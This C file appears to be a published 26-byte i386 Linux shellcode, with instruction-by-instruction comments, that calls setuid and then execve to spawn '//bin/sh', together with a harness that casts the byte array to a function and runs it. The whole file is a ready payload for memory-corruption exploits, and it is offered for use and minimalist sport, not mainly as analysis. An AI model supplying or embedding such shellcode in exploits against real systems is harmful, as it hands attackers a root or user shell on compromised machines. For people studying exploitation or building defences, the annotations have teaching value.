/*
Smallest GNU/Linux x86 setuid/execve shellcode without NULLs
(based on Chema Garcia, aka sch3m4's code from opensec)
(shrunk down only for the fun of gettin' the most minimalistic shellcode possible)

vlan7 - 19/11/2008
http://vlan7.blogspot.com

Shellcode size: 26 bytes
*/

#include <stdio.h>

/*
 * 26-byte i386 Linux payload, annotated instruction by instruction.
 * It issues two int 80h system calls: number 17h (23, setuid on i386)
 * followed by number 0bh (11, execve on i386) on the path "//bin/sh".
 *
 * Reading notes for analysis:
 *  - No byte in the sequence is 00h; the only NUL in the array is the
 *    terminator the string-literal initializer appends, which is why main
 *    reports sizeof(sc)-1.
 *  - ebx is never written before the first int 80h and ecx is never written
 *    at all, so the setuid argument and the execve argv pointer are whatever
 *    those registers held when control arrived here.
 *  - The "//bin/sh" string is built on the stack at run time; it does not
 *    appear contiguously in the byte stream, only as the two push immediates.
 */
char sc[] =
  "\x31\xc0" //xor eax,eax        ; eax = 0
  "\x99" //cdq                    ; sign-extend eax into edx, so edx = 0
  "\xb0\x17" //mov al,17h         ; eax = 17h (23): setuid on i386 Linux
  "\x60" //pusha                  ; save all general registers across the syscall
  "\xcd\x80" //int 80h            ; syscall; its argument ebx is not set by this code
  "\x61" //popa                   ; restore registers: eax is 17h again, edx is 0
  "\x52" //push edx               ; push a zero dword: the string terminator
  "\x68\x6e\x2f\x73\x68" //push 0x68732f6e   ; bytes "n/sh"
  "\x68\x2f\x2f\x62\x69" //push 0x69622f2f   ; bytes "//bi", so esp -> "//bin/sh"
  "\x89\xe3" //mov ebx,esp        ; ebx = pointer to the path string
  "\xb0\x0b" //mov al,0bh         ; eax = 0bh (11): execve on i386 Linux
  "\xcd\x80"; //int 80h           ; execve(ebx = path, ecx = unchanged, edx = 0)

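/*
 * Test harness: prints the banner and the payload length, then transfers
 * control to the bytes stored in sc.
 *
 * sizeof(sc)-1 is the payload length without the NUL terminator that the
 * string-literal initializer appends. sizeof yields a size_t, so it is
 * printed with %zu; passing it to %d is undefined behaviour.
 *
 * sc is an ordinary initialized data object. Where data pages are mapped
 * non-executable (NX/DEP), the indirect call below faults instead of running
 * the bytes. The bytes are i386 code, so they are also only meaningful in a
 * 32-bit x86 process.
 *
 * Returns 0 if control ever comes back from the call.
 */
int main(void) {
  printf("Smallest GNU/Linux x86 setuid/execve shellcode without NULLs"
  "\n(based on Chema Garcia, aka sch3m4's code from opensec)"
  "(only for the fun of gettin' the most minimalistic shellcode possible)"
  "\n\nvlan7 - 19/11/2008"
  "\nhttp://vlan7.blogspot.com"
  "\n\nShellcode size: %zu bytes\n", sizeof(sc)-1);
  /* Reinterpret the data array as a function taking no arguments and call it. */
  (*(void (*)()) sc)();
  return 0;
}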